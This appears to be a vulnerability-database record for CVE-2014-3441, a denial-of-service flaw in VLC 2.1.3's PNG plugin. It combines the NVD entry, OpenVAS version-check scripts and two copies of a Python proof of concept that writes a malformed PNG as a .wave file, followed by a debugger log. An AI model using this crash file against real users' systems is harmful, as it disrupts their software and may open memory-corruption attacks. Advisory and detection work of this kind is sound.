KLA10008Denial of Service in VideoLAN VLC Media Player
2014-05-14T00:00:00
ID KLA10008 Type kaspersky Reporter Kaspersky Lab Modified 2020-05-22T00:00:00
Description
Detect date:
05/14/2014
Severity:
Warning
Description:
An unspecified vulnerability was found in VLC versions 2.1.3 and earlier. By exploiting this vulnerability malicious users can cause denial of service. This vulnerability can be exploited from the network through a specially designed .png file. It is caused by codeclibpng_plugin.dll.
{"id": "KLA10008", "bulletinFamily": "info", "title": "\r KLA10008Denial of Service in VideoLAN VLC Media Player ", "description": "### *Detect date*:\n05/14/2014\n\n### *Severity*:\nWarning\n\n### *Description*:\nAn unspecified vulnerability was found in VLC versions 2.1.3 and earlier. By exploiting this vulnerability malicious users can cause denial of service. This vulnerability can be exploited from the network through a specially designed .png file. It is caused by codeclibpng_plugin.dll.\n\n### *Affected products*:\nVideoLAN VLC Media Player 2.1.3\n\n### *Solution*:\nUpdate to latest version \n[VLC](<http://www.videolan.org/vlc/>)\n\n### *Original advisories*:\n[NVD](<http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-3441>) \n\n\n### *Impacts*:\nDoS \n\n### *Related products*:\n[VLC media player](<https://threats.kaspersky.com/en/product/VLC-media-player/>)\n\n### *CVE-IDS*:\n[CVE-2014-3441](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3441>)4.3Warning", "published": "2014-05-14T00:00:00", "modified": "2020-05-22T00:00:00", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:N/A:P"}, "href": "https://threats.kaspersky.com/en/vulnerability/KLA10008", "reporter": "Kaspersky Lab", "references": [], "cvelist": ["CVE-2014-3441"], "type": "kaspersky", "lastseen": "2020-09-02T11:42:17", "edition": 40, "viewCount": 11, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2014-3441"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310804615", "OPENVAS:1361412562310804614", "OPENVAS:1361412562310804613"]}, {"type": "nessus", "idList": ["VLC_2_1_4.NASL"]}, {"type": "exploitdb", "idList": ["EDB-ID:39177"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:126564"]}], "modified": "2020-09-02T11:42:17", "rev": 2}, "score": {"value": 5.0, "vector": "NONE", "modified": "2020-09-02T11:42:17", "rev": 2}, "vulnersScore": 5.0}, "scheme": null, "immutableFields": []}
{"cve": [{"lastseen": "2021-02-02T06:14:29", "description": "codec\\libpng_plugin.dll in VideoLAN VLC Media Player 2.1.3 allows remote attackers to cause a denial of service (crash) via a crafted .png file, as demonstrated by a png in a .wave file.", "edition": 4, "cvss3": {}, "published": "2014-05-14T19:55:00", "title": "CVE-2014-3441", "type": "cve", "cwe": ["CWE-119"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-3441"], "modified": "2014-05-15T18:58:00", "cpe": ["cpe:/a:videolan:vlc_media_player:2.1.3"], "id": "CVE-2014-3441", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-3441", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:N/A:P"}, "cpe23": ["cpe:2.3:a:videolan:vlc_media_player:2.1.3:*:*:*:*:*:*:*"]}], "openvas": [{"lastseen": "2019-05-29T18:37:09", "bulletinFamily": "scanner", "cvelist": ["CVE-2014-3441"], "description": "This host is installed with VLC Media Player and is prone to denial of\nservice vulnerability.", "modified": "2018-09-15T00:00:00", "published": "2014-06-04T00:00:00", "id": "OPENVAS:1361412562310804615", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310804615", "type": "openvas", "title": "VLC Media Player Denial of Service Vulnerability -01 June14 (Linux)", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_vlc_media_player_dos_vuln_jun14_lin.nasl 11402 2018-09-15 09:13:36Z cfischer $\n#\n# VLC Media Player Denial of Service Vulnerability -01 June14 (Linux)\n#\n# Authors:\n# Shakeel <bshakeel@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2014 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:videolan:vlc_media_player\";\n\nif (description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.804615\");\n script_version(\"$Revision: 11402 $\");\n script_cve_id(\"CVE-2014-3441\");\n script_tag(name:\"cvss_base\", value:\"4.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:N/I:N/A:P\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-09-15 11:13:36 +0200 (Sat, 15 Sep 2018) $\");\n script_tag(name:\"creation_date\", value:\"2014-06-04 11:20:43 +0530 (Wed, 04 Jun 2014)\");\n script_name(\"VLC Media Player Denial of Service Vulnerability -01 June14 (Linux)\");\n\n\n script_tag(name:\"summary\", value:\"This host is installed with VLC Media Player and is prone to denial of\nservice vulnerability.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"insight\", value:\"The flaw exists as user-supplied input is not properly sanitized when handling\na specially crafted WAV file.\");\n script_tag(name:\"impact\", value:\"Successful exploitation will allow attackers to cause a denial of service\nconditions or potentially execute arbitrary code.\");\n script_tag(name:\"affected\", value:\"VLC media player version 2.1.3 on Linux.\");\n script_tag(name:\"solution\", value:\"No known solution was made available for at least one year since the disclosure of this vulnerability. Likely none will be provided anymore. General solution options are to upgrade to a newer release, disable respective features, remove the product or replace the product by another one.\");\n script_tag(name:\"solution_type\", value:\"WillNotFix\");\n script_tag(name:\"qod_type\", value:\"executable_version_unreliable\");\n\n script_xref(name:\"URL\", value:\"http://packetstormsecurity.com/files/126564\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2014 Greenbone Networks GmbH\");\n script_family(\"Denial of Service\");\n script_dependencies(\"secpod_vlc_media_player_detect_lin.nasl\");\n script_mandatory_keys(\"VLCPlayer/Lin/Ver\");\n exit(0);\n}\n\n\ninclude(\"version_func.inc\");\ninclude(\"host_details.inc\");\n\nvlcVer = get_app_version(cpe:CPE);\nif(!vlcVer){\n exit(0);\n}\n\nif(version_is_equal(version:vlcVer, test_version:\"2.1.3\"))\n{\n security_message( port: 0, data: \"The target host was found to be vulnerable\" );\n exit(0);\n}\n", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2019-05-29T18:37:14", "bulletinFamily": "scanner", "cvelist": ["CVE-2014-3441"], "description": "This host is installed with VLC Media Player and is prone to denial of\nservice vulnerability.", "modified": "2018-09-15T00:00:00", "published": "2014-06-04T00:00:00", "id": "OPENVAS:1361412562310804613", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310804613", "type": "openvas", "title": "VLC Media Player Denial of Service Vulnerability -01 June14 (Windows)", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_vlc_media_player_dos_vuln_jun14_win.nasl 11402 2018-09-15 09:13:36Z cfischer $\n#\n# VLC Media Player Denial of Service Vulnerability -01 June14 (Windows)\n#\n# Authors:\n# Shakeel <bshakeel@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2014 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:videolan:vlc_media_player\";\n\nif (description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.804613\");\n script_version(\"$Revision: 11402 $\");\n script_cve_id(\"CVE-2014-3441\");\n script_tag(name:\"cvss_base\", value:\"4.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:N/I:N/A:P\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-09-15 11:13:36 +0200 (Sat, 15 Sep 2018) $\");\n script_tag(name:\"creation_date\", value:\"2014-06-04 11:00:40 +0530 (Wed, 04 Jun 2014)\");\n script_name(\"VLC Media Player Denial of Service Vulnerability -01 June14 (Windows)\");\n\n\n script_tag(name:\"summary\", value:\"This host is installed with VLC Media Player and is prone to denial of\nservice vulnerability.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"insight\", value:\"The flaw exists as user-supplied input is not properly sanitized when handling\na specially crafted WAV file.\");\n script_tag(name:\"impact\", value:\"Successful exploitation will allow attackers to cause a denial of service\nconditions or potentially execute arbitrary code.\");\n script_tag(name:\"affected\", value:\"VLC media player version 2.1.3 on Windows.\");\n script_tag(name:\"solution\", value:\"No known solution was made available for at least one year since the disclosure of this vulnerability.\nLikely none will be provided anymore.\nGeneral solution options are to upgrade to a newer release, disable respective features, remove the product or replace the product by another one.\");\n script_tag(name:\"qod_type\", value:\"registry\");\n script_tag(name:\"solution_type\", value:\"WillNotFix\");\n\n script_xref(name:\"URL\", value:\"http://packetstormsecurity.com/files/126564\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2014 Greenbone Networks GmbH\");\n script_family(\"Denial of Service\");\n script_dependencies(\"secpod_vlc_media_player_detect_win.nasl\");\n script_mandatory_keys(\"VLCPlayer/Win/Installed\");\n exit(0);\n}\n\n\ninclude(\"version_func.inc\");\ninclude(\"host_details.inc\");\n\nvlcVer = get_app_version(cpe:CPE);\nif(!vlcVer){\n exit(0);\n}\n\nif(version_is_equal(version:vlcVer, test_version:\"2.1.3\"))\n{\n security_message( port: 0, data: \"The target host was found to be vulnerable\" );\n exit(0);\n}\n", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2019-05-29T18:37:10", "bulletinFamily": "scanner", "cvelist": ["CVE-2014-3441"], "description": "This host is installed with VLC Media Player and is prone to denial of\nservice vulnerability.", "modified": "2018-09-15T00:00:00", "published": "2014-06-04T00:00:00", "id": "OPENVAS:1361412562310804614", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310804614", "type": "openvas", "title": "VLC Media Player Denial of Service Vulnerability -01 June14 (Mac OS X)", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_vlc_media_player_dos_vuln_jun14_macosx.nasl 11402 2018-09-15 09:13:36Z cfischer $\n#\n# VLC Media Player Denial of Service Vulnerability -01 June14 (Mac OS X)\n#\n# Authors:\n# Shakeel <bshakeel@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2014 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:videolan:vlc_media_player\";\n\nif (description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.804614\");\n script_version(\"$Revision: 11402 $\");\n script_cve_id(\"CVE-2014-3441\");\n script_tag(name:\"cvss_base\", value:\"4.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:N/I:N/A:P\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-09-15 11:13:36 +0200 (Sat, 15 Sep 2018) $\");\n script_tag(name:\"creation_date\", value:\"2014-06-04 11:10:43 +0530 (Wed, 04 Jun 2014)\");\n script_name(\"VLC Media Player Denial of Service Vulnerability -01 June14 (Mac OS X)\");\n\n\n script_tag(name:\"summary\", value:\"This host is installed with VLC Media Player and is prone to denial of\nservice vulnerability.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"insight\", value:\"The flaw exists as user-supplied input is not properly sanitized when handling\na specially crafted WAV file.\");\n script_tag(name:\"impact\", value:\"Successful exploitation will allow attackers to cause a denial of service\nconditions or potentially execute arbitrary code.\");\n script_tag(name:\"affected\", value:\"VLC media player version 2.1.3 on Mac OS X.\");\n script_tag(name:\"solution\", value:\"No known solution was made available for at least one year since the disclosure of this vulnerability. Likely none will be provided anymore. General solution options are to upgrade to a newer release, disable respective features, remove the product or replace the product by another one.\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"WillNotFix\");\n\n script_xref(name:\"URL\", value:\"http://packetstormsecurity.com/files/126564\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2014 Greenbone Networks GmbH\");\n script_family(\"Denial of Service\");\n script_dependencies(\"gb_vlc_media_player_detect_macosx.nasl\");\n script_mandatory_keys(\"VLC/Media/Player/MacOSX/Version\");\n exit(0);\n}\n\n\ninclude(\"version_func.inc\");\ninclude(\"host_details.inc\");\n\nvlcVer = get_app_version(cpe:CPE);\nif(!vlcVer){\n exit(0);\n}\n\nif(version_is_equal(version:vlcVer, test_version:\"2.1.3\"))\n{\n security_message( port: 0, data: \"The target host was found to be vulnerable\" );\n exit(0);\n}\n", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:N/A:P"}}], "exploitdb": [{"lastseen": "2016-02-04T09:39:30", "description": "VLC Media Player '.wav' File Memory Corruption Vulnerability. CVE-2014-3441. Dos exploits for multiple platform", "published": "2014-05-09T00:00:00", "type": "exploitdb", "title": "VLC Media Player '.wav' File Memory Corruption Vulnerability", "bulletinFamily": "exploit", "cvelist": ["CVE-2014-3441"], "modified": "2014-05-09T00:00:00", "id": "EDB-ID:39177", "href": "https://www.exploit-db.com/exploits/39177/", "sourceData": "source: http://www.securityfocus.com/bid/67315/info\r\n\r\nVLC Media Player is prone to a memory-corruption vulnerability.\r\n\r\nAttackers can exploit this issue to cause a denial-of-service condition. Due to the nature of this issue, arbitrary code execution may be possible but this has not been confirmed.\r\n\r\nVLC Media Player 2.1.3 is vulnerable; other versions may also be affected. \r\n\r\n#!/usr/bin/python\r\ndata =\r\n\"\\x89\\x50\\x4E\\x47\\x0D\\x0A\\x1A\\x0A\\x00\\x00\\x00\\x0D\\x49\\x48\\x44\\x52\\x7F\\xFF\\xFF\\xFF\\x00\\x00\\x01\\x02\\x01\\x03\\x00\\x00\\x00\\xBA\\x1B\\xD8\\x84\\x00\\x00\\x00\\x03\\x50\\x4C\\x54\\x45\\xFF\\xFF\\xFF\\xA7\\xC4\\x1B\\xC8\\x00\\x00\\x00\\x01\\x74\\x52\\x4E\\x53\\x00\\x40\\xE6\\xD8\\x66\\x00\\x68\\x92\\x01\\x49\\x44\\x41\\x54\\xFF\\x05\\x3A\\x92\\x65\\x41\\x71\\x68\\x42\\x49\\x45\\x4E\\x44\\xAE\\x42\\x60\\x82\"\r\noutfile = file(\"poc.wave\", 'wb')\r\noutfile.write(data)\r\noutfile.close()\r\nprint \"Created Poc\"\r\n\r\n", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/39177/"}], "packetstorm": [{"lastseen": "2016-12-05T22:16:24", "description": "", "published": "2014-05-09T00:00:00", "type": "packetstorm", "title": "VLC Player 2.1.3 Memory Corruption", "bulletinFamily": "exploit", "cvelist": ["CVE-2014-3441"], "modified": "2014-05-09T00:00:00", "id": "PACKETSTORM:126564", "href": "https://packetstormsecurity.com/files/126564/VLC-Player-2.1.3-Memory-Corruption.html", "sourceData": "`# Exploit Title: [VLCplayer memory corruption in latest Version 2.1.3 ] \n# Date: [2014/05/07] \n# Exploit Author: [Aryan Bayaninejad] \n# Linkedin : [https://www.linkedin.com/profile/view?id=276969082] \n# Vendor Homepage: [www.videolan.org] \n# Software Link: [ \nhttp://filehippo.com/download_vlc_32/download/b39c14a9f03cb9cf32eb01b1123b97bf/ \n] \n# Version: [Version 2.1.3 and prior to that] \n# Tested on: [Windows Xp Sp 3 x86] \n# CVE : [2014-3441] \n \ndetails: \n \nVLCplayer latest version V 2.1.3 suffers from an memory corruption \nVulnerability via a malformed .png file format when load \ncodec\\libpng_plugin.dll, you can change file extention to .wave \n \n \nPoc: \n \n#!/usr/bin/python \ndata = \n\"\\x89\\x50\\x4E\\x47\\x0D\\x0A\\x1A\\x0A\\x00\\x00\\x00\\x0D\\x49\\x48\\x44\\x52\\x7F\\xFF\\xFF\\xFF\\x00\\x00\\x01\\x02\\x01\\x03\\x00\\x00\\x00\\xBA\\x1B\\xD8\\x84\\x00\\x00\\x00\\x03\\x50\\x4C\\x54\\x45\\xFF\\xFF\\xFF\\xA7\\xC4\\x1B\\xC8\\x00\\x00\\x00\\x01\\x74\\x52\\x4E\\x53\\x00\\x40\\xE6\\xD8\\x66\\x00\\x68\\x92\\x01\\x49\\x44\\x41\\x54\\xFF\\x05\\x3A\\x92\\x65\\x41\\x71\\x68\\x42\\x49\\x45\\x4E\\x44\\xAE\\x42\\x60\\x82\" \noutfile = file(\"poc.wave\", 'wb') \noutfile.write(data) \noutfile.close() \nprint \"Created Poc\" \n \n \n \n \n \nwindbg result: \n \n \nMicrosoft (R) Windows Debugger Version 6.2.9200.16384 X86 \nCopyright (c) Microsoft Corporation. All rights reserved. \n \nCommandLine: \"C:\\Program Files\\VideoLAN\\VLC\\vlc.exe\" \nSymbol search path is: *** Invalid *** \n**************************************************************************** \n* Symbol loading may be unreliable without a symbol search path. * \n* Use .symfix to have the debugger choose a symbol path. * \n* After setting your symbol path, use .reload to refresh symbol locations. * \n**************************************************************************** \nExecutable search path is: \nModLoad: 00400000 00426000 image00400000 \nModLoad: 7c900000 7c9af000 ntdll.dll \nModLoad: 7c800000 7c8f6000 C:\\WINDOWS\\system32\\kernel32.dll \nModLoad: 6a300000 6a324000 C:\\Program Files\\VideoLAN\\VLC\\libvlc.dll \nModLoad: 6a540000 6a791000 C:\\Program Files\\VideoLAN\\VLC\\libvlccore.dll \nModLoad: 77dd0000 77e6b000 C:\\WINDOWS\\system32\\ADVAPI32.dll \nModLoad: 77e70000 77f02000 C:\\WINDOWS\\system32\\RPCRT4.dll \nModLoad: 77fe0000 77ff1000 C:\\WINDOWS\\system32\\Secur32.dll \nModLoad: 77c10000 77c68000 C:\\WINDOWS\\system32\\msvcrt.dll \nModLoad: 7c9c0000 7d1d7000 C:\\WINDOWS\\system32\\SHELL32.DLL \nModLoad: 77f10000 77f59000 C:\\WINDOWS\\system32\\GDI32.dll \nModLoad: 7e410000 7e4a1000 C:\\WINDOWS\\system32\\USER32.dll \nModLoad: 77f60000 77fd6000 C:\\WINDOWS\\system32\\SHLWAPI.dll \nModLoad: 76b40000 76b6d000 C:\\WINDOWS\\system32\\WINMM.DLL \nModLoad: 71ab0000 71ac7000 C:\\WINDOWS\\system32\\WS2_32.dll \nModLoad: 71aa0000 71aa8000 C:\\WINDOWS\\system32\\WS2HELP.dll \nModLoad: 76bf0000 76bfb000 C:\\WINDOWS\\system32\\PSAPI.DLL \nModLoad: 771b0000 7725a000 C:\\WINDOWS\\system32\\WININET.DLL \nModLoad: 77a80000 77b15000 C:\\WINDOWS\\system32\\CRYPT32.dll \nModLoad: 77b20000 77b32000 C:\\WINDOWS\\system32\\MSASN1.dll \nModLoad: 77120000 771ab000 C:\\WINDOWS\\system32\\OLEAUT32.dll \nModLoad: 774e0000 7761d000 C:\\WINDOWS\\system32\\ole32.dll \n(250.c1c): Break instruction exception - code 80000003 (first chance) \n*** ERROR: Symbol file could not be found. Defaulted to export symbols for \nntdll.dll - \neax=00351eb4 ebx=7ffde000 ecx=00000006 edx=00000040 esi=00351f48 \nedi=00351eb4 \neip=7c90120e esp=0022fb20 ebp=0022fc94 iopl=0 nv up ei pl nz na po \nnc \ncs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 \nefl=00000202 \nntdll!DbgBreakPoint: \n7c90120e cc int 3 \n0:000> g \nModLoad: 76390000 763ad000 C:\\WINDOWS\\system32\\IMM32.DLL \nModLoad: 629c0000 629c9000 C:\\WINDOWS\\system32\\LPK.DLL \nModLoad: 74d90000 74dfb000 C:\\WINDOWS\\system32\\USP10.dll \nModLoad: 773d0000 774d3000 \nC:\\WINDOWS\\WinSxS\\x86_Microsoft.Windows.Common-Controls_6595b64144ccf1df_6.0.2600.5512_x-ww_35d4ce83\\comctl32.dll \nModLoad: 5ad70000 5ada8000 C:\\WINDOWS\\system32\\uxtheme.dll \nModLoad: 74720000 7476c000 C:\\WINDOWS\\system32\\MSCTF.dll \nModLoad: 77c00000 77c08000 C:\\WINDOWS\\system32\\version.dll \nModLoad: 755c0000 755ee000 C:\\WINDOWS\\system32\\msctfime.ime \nModLoad: 10000000 10008000 C:\\Program Files\\Internet Download \nManager\\idmmkb.dll \nModLoad: 64fc0000 65008000 C:\\Program \nFiles\\VideoLAN\\VLC\\plugins\\access\\libdshow_plugin.dll \nModLoad: 6aac0000 6aacf000 C:\\Program \nFiles\\VideoLAN\\VLC\\plugins\\audio_output\\libdirectsound_plugin.dll \nModLoad: 6e980000 6e990000 C:\\Program \nFiles\\VideoLAN\\VLC\\plugins\\audio_output\\libwaveout_plugin.dll \nModLoad: 6a100000 6a119000 C:\\Program \nFiles\\VideoLAN\\VLC\\plugins\\video_output\\libdirectdraw_plugin.dll \nModLoad: 6c400000 6c5f6000 C:\\Program \nFiles\\VideoLAN\\VLC\\plugins\\access\\liblibbluray_plugin.dll \nModLoad: 68740000 68760000 C:\\Program \nFiles\\VideoLAN\\VLC\\plugins\\access\\libaccess_bd_plugin.dll \nModLoad: 6f440000 6f483000 C:\\Program \nFiles\\VideoLAN\\VLC\\plugins\\access\\libdvdnav_plugin.dll \nModLoad: 6b840000 6b85b000 C:\\Program \nFiles\\VideoLAN\\VLC\\plugins\\access\\libaccess_vdr_plugin.dll \nModLoad: 6f100000 6f114000 C:\\Program \nFiles\\VideoLAN\\VLC\\plugins\\access\\libfilesystem_plugin.dll \nModLoad: 68bc0000 68bd7000 C:\\Program \nFiles\\VideoLAN\\VLC\\plugins\\stream_filter\\libsmooth_plugin.dll \nModLoad: 64a00000 64a8b000 C:\\Program \nFiles\\VideoLAN\\VLC\\plugins\\stream_filter\\libhttplive_plugin.dll \nModLoad: 70680000 70736000 C:\\Program \nFiles\\VideoLAN\\VLC\\plugins\\stream_filter\\libdash_plugin.dll \nModLoad: 6ae40000 6ae64000 C:\\Program \nFiles\\VideoLAN\\VLC\\plugins\\access\\libzip_plugin.dll \nModLoad: 69e40000 69e52000 C:\\Program \nFiles\\VideoLAN\\VLC\\plugins\\access\\libstream_filter_rar_plugin.dll \nModLoad: 6d700000 6d70c000 C:\\Program \nFiles\\VideoLAN\\VLC\\plugins\\stream_filter\\librecord_plugin.dll \nModLoad: 70240000 70267000 C:\\Program \nFiles\\VideoLAN\\VLC\\plugins\\demux\\libplaylist_plugin.dll \nModLoad: 6cd00000 6ce7a000 C:\\Program \nFiles\\VideoLAN\\VLC\\plugins\\meta_engine\\libtaglib_plugin.dll \nModLoad: 66040000 66090000 C:\\Program \nFiles\\VideoLAN\\VLC\\plugins\\lua\\liblua_plugin.dll \nModLoad: 625c0000 626f9000 C:\\Program \nFiles\\VideoLAN\\VLC\\plugins\\misc\\libxml_plugin.dll \nModLoad: 73f10000 73f6c000 C:\\WINDOWS\\system32\\DSOUND.DLL \nModLoad: 77c00000 77c08000 C:\\WINDOWS\\system32\\VERSION.dll \nModLoad: 77920000 77a13000 C:\\WINDOWS\\system32\\setupapi.dll \nModLoad: 76c30000 76c5e000 C:\\WINDOWS\\system32\\WINTRUST.dll \nModLoad: 76c90000 76cb8000 C:\\WINDOWS\\system32\\IMAGEHLP.dll \nModLoad: 77920000 77a13000 C:\\WINDOWS\\system32\\setupapi.dll \nModLoad: 72d20000 72d29000 C:\\WINDOWS\\system32\\wdmaud.drv \nModLoad: 77920000 77a13000 C:\\WINDOWS\\system32\\setupapi.dll \nModLoad: 72d20000 72d29000 C:\\WINDOWS\\system32\\wdmaud.drv \nModLoad: 77920000 77a13000 C:\\WINDOWS\\system32\\setupapi.dll \nModLoad: 72d20000 72d29000 C:\\WINDOWS\\system32\\wdmaud.drv \nModLoad: 77920000 77a13000 C:\\WINDOWS\\system32\\setupapi.dll \nModLoad: 72d20000 72d29000 C:\\WINDOWS\\system32\\wdmaud.drv \nModLoad: 77920000 77a13000 C:\\WINDOWS\\system32\\setupapi.dll \nModLoad: 72d20000 72d29000 C:\\WINDOWS\\system32\\wdmaud.drv \nModLoad: 77920000 77a13000 C:\\WINDOWS\\system32\\setupapi.dll \nModLoad: 72d10000 72d18000 C:\\WINDOWS\\system32\\msacm32.drv \nModLoad: 77be0000 77bf5000 C:\\WINDOWS\\system32\\MSACM32.dll \nModLoad: 77bd0000 77bd7000 C:\\WINDOWS\\system32\\midimap.dll \nModLoad: 77920000 77a13000 C:\\WINDOWS\\system32\\setupapi.dll \nModLoad: 6ff40000 6ff55000 C:\\Program \nFiles\\VideoLAN\\VLC\\plugins\\control\\libhotkeys_plugin.dll \nModLoad: 6e180000 6e191000 C:\\Program \nFiles\\VideoLAN\\VLC\\plugins\\control\\libglobalhotkeys_plugin.dll \nmain libvlc: Running vlc with the default interface. Use 'cvlc' to use vlc \nwithout interface. \nModLoad: 68e80000 6992e000 C:\\Program \nFiles\\VideoLAN\\VLC\\plugins\\gui\\libqt4_plugin.dll \nModLoad: 763b0000 763f9000 C:\\WINDOWS\\system32\\COMDLG32.DLL \nModLoad: 73000000 73026000 C:\\WINDOWS\\system32\\WINSPOOL.DRV \nModLoad: 71ad0000 71ad9000 C:\\WINDOWS\\system32\\WSOCK32.DLL \nModLoad: 769c0000 76a74000 C:\\WINDOWS\\system32\\userenv.dll \nModLoad: 01a20000 01ce5000 C:\\WINDOWS\\system32\\xpsp2res.dll \nModLoad: 5d090000 5d12a000 C:\\WINDOWS\\system32\\comctl32.dll \nModLoad: 76360000 76370000 C:\\WINDOWS\\system32\\winsta.dll \nModLoad: 5b860000 5b8b5000 C:\\WINDOWS\\system32\\NETAPI32.dll \nModLoad: 77920000 77a13000 C:\\WINDOWS\\system32\\SETUPAPI.dll \nModLoad: 6d6c0000 6d6f7000 C:\\Program \nFiles\\VideoLAN\\VLC\\plugins\\demux\\libmp4_plugin.dll \nModLoad: 6e040000 6e05e000 C:\\Program \nFiles\\VideoLAN\\VLC\\plugins\\demux\\libavi_plugin.dll \nModLoad: 68440000 68458000 C:\\Program \nFiles\\VideoLAN\\VLC\\plugins\\demux\\libasf_plugin.dll \nModLoad: 6c380000 6c39b000 C:\\Program \nFiles\\VideoLAN\\VLC\\plugins\\demux\\libflacsys_plugin.dll \nModLoad: 6ef40000 6ef4e000 C:\\Program \nFiles\\VideoLAN\\VLC\\plugins\\demux\\libes_plugin.dll \nes demux error: cannot peek \nes demux error: cannot peek \nModLoad: 011e0000 011fa000 C:\\Program \nFiles\\VideoLAN\\VLC\\plugins\\demux\\libmpc_plugin.dll \nModLoad: 6c2c0000 6c2cd000 C:\\Program \nFiles\\VideoLAN\\VLC\\plugins\\demux\\libtta_plugin.dll \nModLoad: 62380000 6238e000 C:\\Program \nFiles\\VideoLAN\\VLC\\plugins\\demux\\libnuv_plugin.dll \nModLoad: 67e00000 67e0d000 C:\\Program \nFiles\\VideoLAN\\VLC\\plugins\\demux\\libwav_plugin.dll \nModLoad: 03610000 036fc000 C:\\Program \nFiles\\VideoLAN\\VLC\\plugins\\demux\\libsid_plugin.dll \nModLoad: 6bf40000 6bf65000 C:\\Program \nFiles\\VideoLAN\\VLC\\plugins\\services_discovery\\libsap_plugin.dll \nModLoad: 6f8c0000 6f8eb000 C:\\Program \nFiles\\VideoLAN\\VLC\\plugins\\demux\\libogg_plugin.dll \nModLoad: 6a840000 6a96f000 C:\\Program \nFiles\\VideoLAN\\VLC\\plugins\\demux\\libmkv_plugin.dll \nModLoad: 70b00000 70b0c000 C:\\Program \nFiles\\VideoLAN\\VLC\\plugins\\demux\\libdirac_plugin.dll \nModLoad: 6d8c0000 6d97b000 C:\\Program \nFiles\\VideoLAN\\VLC\\plugins\\access\\liblive555_plugin.dll \nModLoad: 64740000 6474d000 C:\\Program \nFiles\\VideoLAN\\VLC\\plugins\\demux\\libsmf_plugin.dll 